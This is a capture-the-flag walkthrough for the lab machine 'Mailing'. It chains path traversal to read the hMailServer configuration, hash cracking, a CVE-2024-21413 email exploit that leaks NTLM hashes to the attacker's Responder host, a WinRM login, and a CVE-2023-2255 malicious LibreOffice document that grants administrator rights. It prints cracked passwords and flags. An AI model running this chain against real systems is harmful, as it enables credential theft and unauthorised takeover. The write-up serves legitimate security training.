Mailing - Walkthrough
Mailing is an easy Windows machine that runs hMailServer and hosts a website vulnerable to Path Traversal. This vulnerability can be exploited to access the hMailServer configuration file, revealing the Administrator password hash. Cracking this hash provides the Administrator password for the email account. We leverage CVE-2024-21413 in the Windows Mail application on the remote host to capture the NTLM hash for user maya. We can then crack this hash to obtain the password and log in as user maya via WinRM. For privilege escalation, we exploit CVE-2023-2255 in LibreOffice.
Reconnaissance
We begin with an Nmap scan to identify open services:
sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.11.14 -oG allPortsThe scan reveals multiple services:
| PORT | STATE | SERVICE |
|---|---|---|
| 25/tcp | open | smtp |
| 80/tcp | open | http |
| 110/tcp | open | pop3 |
| 135/tcp | open | msrpc |
| 139/tcp | open | netbios-ssn |
| 143/tcp | open | imap |
| 445/tcp | open | microsoft-ds |
| 465/tcp | open | smtps |
| 587/tcp | open | submission |
| 993/tcp | open | imaps |
| 5985/tcp | open | wsman |
A targeted scan provides more details:
sudo nmap -p25,80,110,135,139,143,445,465,587,993,5040,5985,7680,47001 -sCV 10.10.11.14 -oN targeted- SMTP/POP3/IMAP → hMailServer
- HTTP → Microsoft IIS 10.0, redirecting to
mailing.htb - WinRM → Port 5985 (Remote Management)
We add the hostname to /etc/hosts:
sudo sh -c 'echo "10.10.11.14 mailing.htb" >> /etc/hosts'
The website reveals several staff members:
| Name | Department |
|---|---|
| Ruy Alonso | IT Team |
| Maya Bendito | Support Team |
| Gregory Smith | Founder and CEO |
Enumeration
We perform content discovery with ffuf:
ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u "http://mailing.htb/FUZZ"Results:
/assets/index.php/instructions
Foothold
The download functionality exposes a potential LFI vulnerability:
http://mailing.htb/download.php?file=instructions.pdf
We test for path traversal:
ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-Windows-adeadfed.txt -u "http://mailing.htb/download.php?file=FUZZ" -fs 15The site is vulnerable. We locate the hMailServer configuration file at C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini:
Administrator password hash: 841bb5acfa6779ae432fd7a4e6600ba7
We crack the MD5 hash using CrackStation:
| Hash | Type | Result |
|---|---|---|
| 841bb5acfa6779ae432fd7a4e6600ba7 | md5 | homenetworkingadministrator |
Exploitation
With the administrator credentials for hMailServer, we exploit CVE-2024-21413 (Microsoft Outlook RCE) to capture NTLM hashes.
First, we set up Responder:
sudo responder -I tun0Then we send a malicious email using the CVE-2024-21413 PoC:
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username [email protected] --password homenetworkingadministrator --sender [email protected] --recipient [email protected] --url 10.10.14.7 --subject exploitResponder captures the NTLMv2 hash:
[SMB] NTLMv2-SSP Client : 10.10.11.14
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash : maya::MAILING:d3960134b3f9567d:472162304C11627880D634C11E417411:...We crack the hash with hashcat:
hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt| Username | Password |
|---|---|
| maya | m4y4ngs4ri |
Using these credentials, we connect via WinRM:
evil-winrm -i 10.10.11.14 -u maya -p m4y4ngs4riWe capture the user flag:
more user.txtUser flag: e6ab9fac675d9f2d2db0f0de49d3b2e0
Privilege Escalation
We enumerate scheduled tasks and discover the Test task:
*Evil-WinRM* PS C:\Users\maya\Documents> schtasks /query /tn Test /v /fo LISTThe task runs as localadmin and executes a PowerShell script that opens .odt files in LibreOffice from C:\Important Documents.
We check the LibreOffice version and find it's 7.4, which is vulnerable to CVE-2023-2255.
We create a malicious ODT file to add maya to the Administrators group:
python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'We upload it to the target:
*Evil-WinRM* PS C:\Important Documents> wget http://10.10.14.7/exploit.odt -o exploit.odtAfter the scheduled task runs, we reconnect and verify maya is now an Administrator:
net user mayaLocal Group Memberships *Administradores *Remote Management UseWe can now read the root flag:
cat C:\Users\localadmin\Desktop\root.txtRoot flag: 19c60abfa5edc58388a401ccc8bac673